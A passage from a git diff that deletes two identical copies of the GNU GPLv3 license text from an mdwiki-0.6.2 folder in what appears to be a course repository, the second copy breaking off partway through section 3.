-![image-20200713093425282](C:\Users\adhd\AppData\Roaming\Typora\typora-user-images\image-20200713093425282.png)
\ No newline at end of file
diff --git a/IntroClassFiles/mdwiki-0.6.2/GPLv3.txt b/IntroClassFiles/mdwiki-0.6.2/GPLv3.txt
deleted file mode 100755
index 94a9ed02..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/GPLv3.txt
+++ /dev/null
@@ -1,674 +0,0 @@
-                    GNU GENERAL PUBLIC LICENSE
-                       Version 3, 29 June 2007
-
- Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-                            Preamble
-
-  The GNU General Public License is a free, copyleft license for
-software and other kinds of works.
-
-  The licenses for most software and other practical works are designed
-to take away your freedom to share and change the works.  By contrast,
-the GNU General Public License is intended to guarantee your freedom to
-share and change all versions of a program--to make sure it remains free
-software for all its users.  We, the Free Software Foundation, use the
-GNU General Public License for most of our software; it applies also to
-any other work released this way by its authors.  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-them if you wish), that you receive source code or can get it if you
-want it, that you can change the software or use pieces of it in new
-free programs, and that you know you can do these things.
-
-  To protect your rights, we need to prevent others from denying you
-these rights or asking you to surrender the rights.  Therefore, you have
-certain responsibilities if you distribute copies of the software, or if
-you modify it: responsibilities to respect the freedom of others.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must pass on to the recipients the same
-freedoms that you received.  You must make sure that they, too, receive
-or can get the source code.  And you must show them these terms so they
-know their rights.
-
-  Developers that use the GNU GPL protect your rights with two steps:
-(1) assert copyright on the software, and (2) offer you this License
-giving you legal permission to copy, distribute and/or modify it.
-
-  For the developers' and authors' protection, the GPL clearly explains
-that there is no warranty for this free software.  For both users' and
-authors' sake, the GPL requires that modified versions be marked as
-changed, so that their problems will not be attributed erroneously to
-authors of previous versions.
-
-  Some devices are designed to deny users access to install or run
-modified versions of the software inside them, although the manufacturer
-can do so.  This is fundamentally incompatible with the aim of
-protecting users' freedom to change the software.  The systematic
-pattern of such abuse occurs in the area of products for individuals to
-use, which is precisely where it is most unacceptable.  Therefore, we
-have designed this version of the GPL to prohibit the practice for those
-products.  If such problems arise substantially in other domains, we
-stand ready to extend this provision to those domains in future versions
-of the GPL, as needed to protect the freedom of users.
-
-  Finally, every program is threatened constantly by software patents.
-States should not allow patents to restrict development and use of
-software on general-purpose computers, but in those that do, we wish to
-avoid the special danger that patents applied to a free program could
-make it effectively proprietary.  To prevent this, the GPL assures that
-patents cannot be used to render the program non-free.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-                       TERMS AND CONDITIONS
-
-  0. Definitions.
-
-  "This License" refers to version 3 of the GNU General Public License.
-
-  "Copyright" also means copyright-like laws that apply to other kinds of
-works, such as semiconductor masks.
-
-  "The Program" refers to any copyrightable work licensed under this
-License.  Each licensee is addressed as "you".  "Licensees" and
-"recipients" may be individuals or organizations.
-
-  To "modify" a work means to copy from or adapt all or part of the work
-in a fashion requiring copyright permission, other than the making of an
-exact copy.  The resulting work is called a "modified version" of the
-earlier work or a work "based on" the earlier work.
-
-  A "covered work" means either the unmodified Program or a work based
-on the Program.
-
-  To "propagate" a work means to do anything with it that, without
-permission, would make you directly or secondarily liable for
-infringement under applicable copyright law, except executing it on a
-computer or modifying a private copy.  Propagation includes copying,
-distribution (with or without modification), making available to the
-public, and in some countries other activities as well.
-
-  To "convey" a work means any kind of propagation that enables other
-parties to make or receive copies.  Mere interaction with a user through
-a computer network, with no transfer of a copy, is not conveying.
-
-  An interactive user interface displays "Appropriate Legal Notices"
-to the extent that it includes a convenient and prominently visible
-feature that (1) displays an appropriate copyright notice, and (2)
-tells the user that there is no warranty for the work (except to the
-extent that warranties are provided), that licensees may convey the
-work under this License, and how to view a copy of this License.  If
-the interface presents a list of user commands or options, such as a
-menu, a prominent item in the list meets this criterion.
-
-  1. Source Code.
-
-  The "source code" for a work means the preferred form of the work
-for making modifications to it.  "Object code" means any non-source
-form of a work.
-
-  A "Standard Interface" means an interface that either is an official
-standard defined by a recognized standards body, or, in the case of
-interfaces specified for a particular programming language, one that
-is widely used among developers working in that language.
-
-  The "System Libraries" of an executable work include anything, other
-than the work as a whole, that (a) is included in the normal form of
-packaging a Major Component, but which is not part of that Major
-Component, and (b) serves only to enable use of the work with that
-Major Component, or to implement a Standard Interface for which an
-implementation is available to the public in source code form.  A
-"Major Component", in this context, means a major essential component
-(kernel, window system, and so on) of the specific operating system
-(if any) on which the executable work runs, or a compiler used to
-produce the work, or an object code interpreter used to run it.
-
-  The "Corresponding Source" for a work in object code form means all
-the source code needed to generate, install, and (for an executable
-work) run the object code and to modify the work, including scripts to
-control those activities.  However, it does not include the work's
-System Libraries, or general-purpose tools or generally available free
-programs which are used unmodified in performing those activities but
-which are not part of the work.  For example, Corresponding Source
-includes interface definition files associated with source files for
-the work, and the source code for shared libraries and dynamically
-linked subprograms that the work is specifically designed to require,
-such as by intimate data communication or control flow between those
-subprograms and other parts of the work.
-
-  The Corresponding Source need not include anything that users
-can regenerate automatically from other parts of the Corresponding
-Source.
-
-  The Corresponding Source for a work in source code form is that
-same work.
-
-  2. Basic Permissions.
-
-  All rights granted under this License are granted for the term of
-copyright on the Program, and are irrevocable provided the stated
-conditions are met.  This License explicitly affirms your unlimited
-permission to run the unmodified Program.  The output from running a
-covered work is covered by this License only if the output, given its
-content, constitutes a covered work.  This License acknowledges your
-rights of fair use or other equivalent, as provided by copyright law.
-
-  You may make, run and propagate covered works that you do not
-convey, without conditions so long as your license otherwise remains
-in force.  You may convey covered works to others for the sole purpose
-of having them make modifications exclusively for you, or provide you
-with facilities for running those works, provided that you comply with
-the terms of this License in conveying all material for which you do
-not control copyright.  Those thus making or running the covered works
-for you must do so exclusively on your behalf, under your direction
-and control, on terms that prohibit them from making any copies of
-your copyrighted material outside their relationship with you.
-
-  Conveying under any other circumstances is permitted solely under
-the conditions stated below.  Sublicensing is not allowed; section 10
-makes it unnecessary.
-
-  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
-
-  No covered work shall be deemed part of an effective technological
-measure under any applicable law fulfilling obligations under article
-11 of the WIPO copyright treaty adopted on 20 December 1996, or
-similar laws prohibiting or restricting circumvention of such
-measures.
-
-  When you convey a covered work, you waive any legal power to forbid
-circumvention of technological measures to the extent such circumvention
-is effected by exercising rights under this License with respect to
-the covered work, and you disclaim any intention to limit operation or
-modification of the work as a means of enforcing, against the work's
-users, your or third parties' legal rights to forbid circumvention of
-technological measures.
-
-  4. Conveying Verbatim Copies.
-
-  You may convey verbatim copies of the Program's source code as you
-receive it, in any medium, provided that you conspicuously and
-appropriately publish on each copy an appropriate copyright notice;
-keep intact all notices stating that this License and any
-non-permissive terms added in accord with section 7 apply to the code;
-keep intact all notices of the absence of any warranty; and give all
-recipients a copy of this License along with the Program.
-
-  You may charge any price or no price for each copy that you convey,
-and you may offer support or warranty protection for a fee.
-
-  5. Conveying Modified Source Versions.
-
-  You may convey a work based on the Program, or the modifications to
-produce it from the Program, in the form of source code under the
-terms of section 4, provided that you also meet all of these conditions:
-
-    a) The work must carry prominent notices stating that you modified
-    it, and giving a relevant date.
-
-    b) The work must carry prominent notices stating that it is
-    released under this License and any conditions added under section
-    7.  This requirement modifies the requirement in section 4 to
-    "keep intact all notices".
-
-    c) You must license the entire work, as a whole, under this
-    License to anyone who comes into possession of a copy.  This
-    License will therefore apply, along with any applicable section 7
-    additional terms, to the whole of the work, and all its parts,
-    regardless of how they are packaged.  This License gives no
-    permission to license the work in any other way, but it does not
-    invalidate such permission if you have separately received it.
-
-    d) If the work has interactive user interfaces, each must display
-    Appropriate Legal Notices; however, if the Program has interactive
-    interfaces that do not display Appropriate Legal Notices, your
-    work need not make them do so.
-
-  A compilation of a covered work with other separate and independent
-works, which are not by their nature extensions of the covered work,
-and which are not combined with it such as to form a larger program,
-in or on a volume of a storage or distribution medium, is called an
-"aggregate" if the compilation and its resulting copyright are not
-used to limit the access or legal rights of the compilation's users
-beyond what the individual works permit.  Inclusion of a covered work
-in an aggregate does not cause this License to apply to the other
-parts of the aggregate.
-
-  6. Conveying Non-Source Forms.
-
-  You may convey a covered work in object code form under the terms
-of sections 4 and 5, provided that you also convey the
-machine-readable Corresponding Source under the terms of this License,
-in one of these ways:
-
-    a) Convey the object code in, or embodied in, a physical product
-    (including a physical distribution medium), accompanied by the
-    Corresponding Source fixed on a durable physical medium
-    customarily used for software interchange.
-
-    b) Convey the object code in, or embodied in, a physical product
-    (including a physical distribution medium), accompanied by a
-    written offer, valid for at least three years and valid for as
-    long as you offer spare parts or customer support for that product
-    model, to give anyone who possesses the object code either (1) a
-    copy of the Corresponding Source for all the software in the
-    product that is covered by this License, on a durable physical
-    medium customarily used for software interchange, for a price no
-    more than your reasonable cost of physically performing this
-    conveying of source, or (2) access to copy the
-    Corresponding Source from a network server at no charge.
-
-    c) Convey individual copies of the object code with a copy of the
-    written offer to provide the Corresponding Source.  This
-    alternative is allowed only occasionally and noncommercially, and
-    only if you received the object code with such an offer, in accord
-    with subsection 6b.
-
-    d) Convey the object code by offering access from a designated
-    place (gratis or for a charge), and offer equivalent access to the
-    Corresponding Source in the same way through the same place at no
-    further charge.  You need not require recipients to copy the
-    Corresponding Source along with the object code.  If the place to
-    copy the object code is a network server, the Corresponding Source
-    may be on a different server (operated by you or a third party)
-    that supports equivalent copying facilities, provided you maintain
-    clear directions next to the object code saying where to find the
-    Corresponding Source.  Regardless of what server hosts the
-    Corresponding Source, you remain obligated to ensure that it is
-    available for as long as needed to satisfy these requirements.
-
-    e) Convey the object code using peer-to-peer transmission, provided
-    you inform other peers where the object code and Corresponding
-    Source of the work are being offered to the general public at no
-    charge under subsection 6d.
-
-  A separable portion of the object code, whose source code is excluded
-from the Corresponding Source as a System Library, need not be
-included in conveying the object code work.
-
-  A "User Product" is either (1) a "consumer product", which means any
-tangible personal property which is normally used for personal, family,
-or household purposes, or (2) anything designed or sold for incorporation
-into a dwelling.  In determining whether a product is a consumer product,
-doubtful cases shall be resolved in favor of coverage.  For a particular
-product received by a particular user, "normally used" refers to a
-typical or common use of that class of product, regardless of the status
-of the particular user or of the way in which the particular user
-actually uses, or expects or is expected to use, the product.  A product
-is a consumer product regardless of whether the product has substantial
-commercial, industrial or non-consumer uses, unless such uses represent
-the only significant mode of use of the product.
-
-  "Installation Information" for a User Product means any methods,
-procedures, authorization keys, or other information required to install
-and execute modified versions of a covered work in that User Product from
-a modified version of its Corresponding Source.  The information must
-suffice to ensure that the continued functioning of the modified object
-code is in no case prevented or interfered with solely because
-modification has been made.
-
-  If you convey an object code work under this section in, or with, or
-specifically for use in, a User Product, and the conveying occurs as
-part of a transaction in which the right of possession and use of the
-User Product is transferred to the recipient in perpetuity or for a
-fixed term (regardless of how the transaction is characterized), the
-Corresponding Source conveyed under this section must be accompanied
-by the Installation Information.  But this requirement does not apply
-if neither you nor any third party retains the ability to install
-modified object code on the User Product (for example, the work has
-been installed in ROM).
-
-  The requirement to provide Installation Information does not include a
-requirement to continue to provide support service, warranty, or updates
-for a work that has been modified or installed by the recipient, or for
-the User Product in which it has been modified or installed.  Access to a
-network may be denied when the modification itself materially and
-adversely affects the operation of the network or violates the rules and
-protocols for communication across the network.
-
-  Corresponding Source conveyed, and Installation Information provided,
-in accord with this section must be in a format that is publicly
-documented (and with an implementation available to the public in
-source code form), and must require no special password or key for
-unpacking, reading or copying.
-
-  7. Additional Terms.
-
-  "Additional permissions" are terms that supplement the terms of this
-License by making exceptions from one or more of its conditions.
-Additional permissions that are applicable to the entire Program shall
-be treated as though they were included in this License, to the extent
-that they are valid under applicable law.  If additional permissions
-apply only to part of the Program, that part may be used separately
-under those permissions, but the entire Program remains governed by
-this License without regard to the additional permissions.
-
-  When you convey a copy of a covered work, you may at your option
-remove any additional permissions from that copy, or from any part of
-it.  (Additional permissions may be written to require their own
-removal in certain cases when you modify the work.)  You may place
-additional permissions on material, added by you to a covered work,
-for which you have or can give appropriate copyright permission.
-
-  Notwithstanding any other provision of this License, for material you
-add to a covered work, you may (if authorized by the copyright holders of
-that material) supplement the terms of this License with terms:
-
-    a) Disclaiming warranty or limiting liability differently from the
-    terms of sections 15 and 16 of this License; or
-
-    b) Requiring preservation of specified reasonable legal notices or
-    author attributions in that material or in the Appropriate Legal
-    Notices displayed by works containing it; or
-
-    c) Prohibiting misrepresentation of the origin of that material, or
-    requiring that modified versions of such material be marked in
-    reasonable ways as different from the original version; or
-
-    d) Limiting the use for publicity purposes of names of licensors or
-    authors of the material; or
-
-    e) Declining to grant rights under trademark law for use of some
-    trade names, trademarks, or service marks; or
-
-    f) Requiring indemnification of licensors and authors of that
-    material by anyone who conveys the material (or modified versions of
-    it) with contractual assumptions of liability to the recipient, for
-    any liability that these contractual assumptions directly impose on
-    those licensors and authors.
-
-  All other non-permissive additional terms are considered "further
-restrictions" within the meaning of section 10.  If the Program as you
-received it, or any part of it, contains a notice stating that it is
-governed by this License along with a term that is a further
-restriction, you may remove that term.  If a license document contains
-a further restriction but permits relicensing or conveying under this
-License, you may add to a covered work material governed by the terms
-of that license document, provided that the further restriction does
-not survive such relicensing or conveying.
-
-  If you add terms to a covered work in accord with this section, you
-must place, in the relevant source files, a statement of the
-additional terms that apply to those files, or a notice indicating
-where to find the applicable terms.
-
-  Additional terms, permissive or non-permissive, may be stated in the
-form of a separately written license, or stated as exceptions;
-the above requirements apply either way.
-
-  8. Termination.
-
-  You may not propagate or modify a covered work except as expressly
-provided under this License.  Any attempt otherwise to propagate or
-modify it is void, and will automatically terminate your rights under
-this License (including any patent licenses granted under the third
-paragraph of section 11).
-
-  However, if you cease all violation of this License, then your
-license from a particular copyright holder is reinstated (a)
-provisionally, unless and until the copyright holder explicitly and
-finally terminates your license, and (b) permanently, if the copyright
-holder fails to notify you of the violation by some reasonable means
-prior to 60 days after the cessation.
-
-  Moreover, your license from a particular copyright holder is
-reinstated permanently if the copyright holder notifies you of the
-violation by some reasonable means, this is the first time you have
-received notice of violation of this License (for any work) from that
-copyright holder, and you cure the violation prior to 30 days after
-your receipt of the notice.
-
-  Termination of your rights under this section does not terminate the
-licenses of parties who have received copies or rights from you under
-this License.  If your rights have been terminated and not permanently
-reinstated, you do not qualify to receive new licenses for the same
-material under section 10.
-
-  9. Acceptance Not Required for Having Copies.
-
-  You are not required to accept this License in order to receive or
-run a copy of the Program.  Ancillary propagation of a covered work
-occurring solely as a consequence of using peer-to-peer transmission
-to receive a copy likewise does not require acceptance.  However,
-nothing other than this License grants you permission to propagate or
-modify any covered work.  These actions infringe copyright if you do
-not accept this License.  Therefore, by modifying or propagating a
-covered work, you indicate your acceptance of this License to do so.
-
-  10. Automatic Licensing of Downstream Recipients.
-
-  Each time you convey a covered work, the recipient automatically
-receives a license from the original licensors, to run, modify and
-propagate that work, subject to this License.  You are not responsible
-for enforcing compliance by third parties with this License.
-
-  An "entity transaction" is a transaction transferring control of an
-organization, or substantially all assets of one, or subdividing an
-organization, or merging organizations.  If propagation of a covered
-work results from an entity transaction, each party to that
-transaction who receives a copy of the work also receives whatever
-licenses to the work the party's predecessor in interest had or could
-give under the previous paragraph, plus a right to possession of the
-Corresponding Source of the work from the predecessor in interest, if
-the predecessor has it or can get it with reasonable efforts.
-
-  You may not impose any further restrictions on the exercise of the
-rights granted or affirmed under this License.  For example, you may
-not impose a license fee, royalty, or other charge for exercise of
-rights granted under this License, and you may not initiate litigation
-(including a cross-claim or counterclaim in a lawsuit) alleging that
-any patent claim is infringed by making, using, selling, offering for
-sale, or importing the Program or any portion of it.
-
-  11. Patents.
-
-  A "contributor" is a copyright holder who authorizes use under this
-License of the Program or a work on which the Program is based.  The
-work thus licensed is called the contributor's "contributor version".
-
-  A contributor's "essential patent claims" are all patent claims
-owned or controlled by the contributor, whether already acquired or
-hereafter acquired, that would be infringed by some manner, permitted
-by this License, of making, using, or selling its contributor version,
-but do not include claims that would be infringed only as a
-consequence of further modification of the contributor version.  For
-purposes of this definition, "control" includes the right to grant
-patent sublicenses in a manner consistent with the requirements of
-this License.
-
-  Each contributor grants you a non-exclusive, worldwide, royalty-free
-patent license under the contributor's essential patent claims, to
-make, use, sell, offer for sale, import and otherwise run, modify and
-propagate the contents of its contributor version.
-
-  In the following three paragraphs, a "patent license" is any express
-agreement or commitment, however denominated, not to enforce a patent
-(such as an express permission to practice a patent or covenant not to
-sue for patent infringement).  To "grant" such a patent license to a
-party means to make such an agreement or commitment not to enforce a
-patent against the party.
-
-  If you convey a covered work, knowingly relying on a patent license,
-and the Corresponding Source of the work is not available for anyone
-to copy, free of charge and under the terms of this License, through a
-publicly available network server or other readily accessible means,
-then you must either (1) cause the Corresponding Source to be so
-available, or (2) arrange to deprive yourself of the benefit of the
-patent license for this particular work, or (3) arrange, in a manner
-consistent with the requirements of this License, to extend the patent
-license to downstream recipients.  "Knowingly relying" means you have
-actual knowledge that, but for the patent license, your conveying the
-covered work in a country, or your recipient's use of the covered work
-in a country, would infringe one or more identifiable patents in that
-country that you have reason to believe are valid.
-
-  If, pursuant to or in connection with a single transaction or
-arrangement, you convey, or propagate by procuring conveyance of, a
-covered work, and grant a patent license to some of the parties
-receiving the covered work authorizing them to use, propagate, modify
-or convey a specific copy of the covered work, then the patent license
-you grant is automatically extended to all recipients of the covered
-work and works based on it.
-
-  A patent license is "discriminatory" if it does not include within
-the scope of its coverage, prohibits the exercise of, or is
-conditioned on the non-exercise of one or more of the rights that are
-specifically granted under this License.  You may not convey a covered
-work if you are a party to an arrangement with a third party that is
-in the business of distributing software, under which you make payment
-to the third party based on the extent of your activity of conveying
-the work, and under which the third party grants, to any of the
-parties who would receive the covered work from you, a discriminatory
-patent license (a) in connection with copies of the covered work
-conveyed by you (or copies made from those copies), or (b) primarily
-for and in connection with specific products or compilations that
-contain the covered work, unless you entered into that arrangement,
-or that patent license was granted, prior to 28 March 2007.
-
-  Nothing in this License shall be construed as excluding or limiting
-any implied license or other defenses to infringement that may
-otherwise be available to you under applicable patent law.
-
-  12. No Surrender of Others' Freedom.
-
-  If conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot convey a
-covered work so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you may
-not convey it at all.  For example, if you agree to terms that obligate you
-to collect a royalty for further conveying from those to whom you convey
-the Program, the only way you could satisfy both those terms and this
-License would be to refrain entirely from conveying the Program.
-
-  13. Use with the GNU Affero General Public License.
-
-  Notwithstanding any other provision of this License, you have
-permission to link or combine any covered work with a work licensed
-under version 3 of the GNU Affero General Public License into a single
-combined work, and to convey the resulting work.  The terms of this
-License will continue to apply to the part which is the covered work,
-but the special requirements of the GNU Affero General Public License,
-section 13, concerning interaction through a network will apply to the
-combination as such.
-
-  14. Revised Versions of this License.
-
-  The Free Software Foundation may publish revised and/or new versions of
-the GNU General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-  Each version is given a distinguishing version number.  If the
-Program specifies that a certain numbered version of the GNU General
-Public License "or any later version" applies to it, you have the
-option of following the terms and conditions either of that numbered
-version or of any later version published by the Free Software
-Foundation.  If the Program does not specify a version number of the
-GNU General Public License, you may choose any version ever published
-by the Free Software Foundation.
-
-  If the Program specifies that a proxy can decide which future
-versions of the GNU General Public License can be used, that proxy's
-public statement of acceptance of a version permanently authorizes you
-to choose that version for the Program.
-
-  Later license versions may give you additional or different
-permissions.  However, no additional obligations are imposed on any
-author or copyright holder as a result of your choosing to follow a
-later version.
-
-  15. Disclaimer of Warranty.
-
-  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
-APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
-HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
-OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
-IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
-ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
-  16. Limitation of Liability.
-
-  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
-THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
-GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
-USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
-DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
-PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
-EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
-SUCH DAMAGES.
-
-  17. Interpretation of Sections 15 and 16.
-
-  If the disclaimer of warranty and limitation of liability provided
-above cannot be given local legal effect according to their terms,
-reviewing courts shall apply local law that most closely approximates
-an absolute waiver of all civil liability in connection with the
-Program, unless a warranty or assumption of liability accompanies a
-copy of the Program in return for a fee.
-
-                     END OF TERMS AND CONDITIONS
-
-            How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-state the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software: you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation, either version 3 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program.  If not, see <http://www.gnu.org/licenses/>.
-
-Also add information on how to contact you by electronic and paper mail.
-
-  If the program does terminal interaction, make it output a short
-notice like this when it starts in an interactive mode:
-
-    <program>  Copyright (C) <year>  <name of author>
-    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, your program's commands
-might be different; for a GUI interface, you would use an "about box".
-
-  You should also get your employer (if you work as a programmer) or school,
-if any, to sign a "copyright disclaimer" for the program, if necessary.
-For more information on this, and how to apply and follow the GNU GPL, see
-<http://www.gnu.org/licenses/>.
-
-  The GNU General Public License does not permit incorporating your program
-into proprietary programs.  If your program is a subroutine library, you
-may consider it more useful to permit linking proprietary applications with
-the library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.  But first, please read
-<http://www.gnu.org/philosophy/why-not-lgpl.html>.
diff --git a/IntroClassFiles/mdwiki-0.6.2/GPLv3_1.txt b/IntroClassFiles/mdwiki-0.6.2/GPLv3_1.txt
deleted file mode 100755
index 94a9ed02..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/GPLv3_1.txt
+++ /dev/null
@@ -1,674 +0,0 @@
-                    GNU GENERAL PUBLIC LICENSE
-                       Version 3, 29 June 2007
-
- Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-                            Preamble
-
-  The GNU General Public License is a free, copyleft license for
-software and other kinds of works.
-
-  The licenses for most software and other practical works are designed
-to take away your freedom to share and change the works.  By contrast,
-the GNU General Public License is intended to guarantee your freedom to
-share and change all versions of a program--to make sure it remains free
-software for all its users.  We, the Free Software Foundation, use the
-GNU General Public License for most of our software; it applies also to
-any other work released this way by its authors.  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-them if you wish), that you receive source code or can get it if you
-want it, that you can change the software or use pieces of it in new
-free programs, and that you know you can do these things.
-
-  To protect your rights, we need to prevent others from denying you
-these rights or asking you to surrender the rights.  Therefore, you have
-certain responsibilities if you distribute copies of the software, or if
-you modify it: responsibilities to respect the freedom of others.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must pass on to the recipients the same
-freedoms that you received.  You must make sure that they, too, receive
-or can get the source code.  And you must show them these terms so they
-know their rights.
-
-  Developers that use the GNU GPL protect your rights with two steps:
-(1) assert copyright on the software, and (2) offer you this License
-giving you legal permission to copy, distribute and/or modify it.
-
-  For the developers' and authors' protection, the GPL clearly explains
-that there is no warranty for this free software.  For both users' and
-authors' sake, the GPL requires that modified versions be marked as
-changed, so that their problems will not be attributed erroneously to
-authors of previous versions.
-
-  Some devices are designed to deny users access to install or run
-modified versions of the software inside them, although the manufacturer
-can do so.  This is fundamentally incompatible with the aim of
-protecting users' freedom to change the software.  The systematic
-pattern of such abuse occurs in the area of products for individuals to
-use, which is precisely where it is most unacceptable.  Therefore, we
-have designed this version of the GPL to prohibit the practice for those
-products.  If such problems arise substantially in other domains, we
-stand ready to extend this provision to those domains in future versions
-of the GPL, as needed to protect the freedom of users.
-
-  Finally, every program is threatened constantly by software patents.
-States should not allow patents to restrict development and use of
-software on general-purpose computers, but in those that do, we wish to
-avoid the special danger that patents applied to a free program could
-make it effectively proprietary.  To prevent this, the GPL assures that
-patents cannot be used to render the program non-free.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-                       TERMS AND CONDITIONS
-
-  0. Definitions.
-
-  "This License" refers to version 3 of the GNU General Public License.
-
-  "Copyright" also means copyright-like laws that apply to other kinds of
-works, such as semiconductor masks.
-
-  "The Program" refers to any copyrightable work licensed under this
-License.  Each licensee is addressed as "you".  "Licensees" and
-"recipients" may be individuals or organizations.
-
-  To "modify" a work means to copy from or adapt all or part of the work
-in a fashion requiring copyright permission, other than the making of an
-exact copy.  The resulting work is called a "modified version" of the
-earlier work or a work "based on" the earlier work.
-
-  A "covered work" means either the unmodified Program or a work based
-on the Program.
-
-  To "propagate" a work means to do anything with it that, without
-permission, would make you directly or secondarily liable for
-infringement under applicable copyright law, except executing it on a
-computer or modifying a private copy.  Propagation includes copying,
-distribution (with or without modification), making available to the
-public, and in some countries other activities as well.
-
-  To "convey" a work means any kind of propagation that enables other
-parties to make or receive copies.  Mere interaction with a user through
-a computer network, with no transfer of a copy, is not conveying.
-
-  An interactive user interface displays "Appropriate Legal Notices"
-to the extent that it includes a convenient and prominently visible
-feature that (1) displays an appropriate copyright notice, and (2)
-tells the user that there is no warranty for the work (except to the
-extent that warranties are provided), that licensees may convey the
-work under this License, and how to view a copy of this License.  If
-the interface presents a list of user commands or options, such as a
-menu, a prominent item in the list meets this criterion.
-
-  1. Source Code.
-
-  The "source code" for a work means the preferred form of the work
-for making modifications to it.  "Object code" means any non-source
-form of a work.
-
-  A "Standard Interface" means an interface that either is an official
-standard defined by a recognized standards body, or, in the case of
-interfaces specified for a particular programming language, one that
-is widely used among developers working in that language.
-
-  The "System Libraries" of an executable work include anything, other
-than the work as a whole, that (a) is included in the normal form of
-packaging a Major Component, but which is not part of that Major
-Component, and (b) serves only to enable use of the work with that
-Major Component, or to implement a Standard Interface for which an
-implementation is available to the public in source code form.  A
-"Major Component", in this context, means a major essential component
-(kernel, window system, and so on) of the specific operating system
-(if any) on which the executable work runs, or a compiler used to
-produce the work, or an object code interpreter used to run it.
-
-  The "Corresponding Source" for a work in object code form means all
-the source code needed to generate, install, and (for an executable
-work) run the object code and to modify the work, including scripts to
-control those activities.  However, it does not include the work's
-System Libraries, or general-purpose tools or generally available free
-programs which are used unmodified in performing those activities but
-which are not part of the work.  For example, Corresponding Source
-includes interface definition files associated with source files for
-the work, and the source code for shared libraries and dynamically
-linked subprograms that the work is specifically designed to require,
-such as by intimate data communication or control flow between those
-subprograms and other parts of the work.
-
-  The Corresponding Source need not include anything that users
-can regenerate automatically from other parts of the Corresponding
-Source.
-
-  The Corresponding Source for a work in source code form is that
-same work.
-
-  2. Basic Permissions.
-
-  All rights granted under this License are granted for the term of
-copyright on the Program, and are irrevocable provided the stated
-conditions are met.  This License explicitly affirms your unlimited
-permission to run the unmodified Program.  The output from running a
-covered work is covered by this License only if the output, given its
-content, constitutes a covered work.  This License acknowledges your
-rights of fair use or other equivalent, as provided by copyright law.
-
-  You may make, run and propagate covered works that you do not
-convey, without conditions so long as your license otherwise remains
-in force.  You may convey covered works to others for the sole purpose
-of having them make modifications exclusively for you, or provide you
-with facilities for running those works, provided that you comply with
-the terms of this License in conveying all material for which you do
-not control copyright.  Those thus making or running the covered works
-for you must do so exclusively on your behalf, under your direction
-and control, on terms that prohibit them from making any copies of
-your copyrighted material outside their relationship with you.
-
-  Conveying under any other circumstances is permitted solely under
-the conditions stated below.  Sublicensing is not allowed; section 10
-makes it unnecessary.
-
-  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
-
-  No covered work shall be deemed part of an effective technological
-measure under any applicable law fulfilling obligations under article
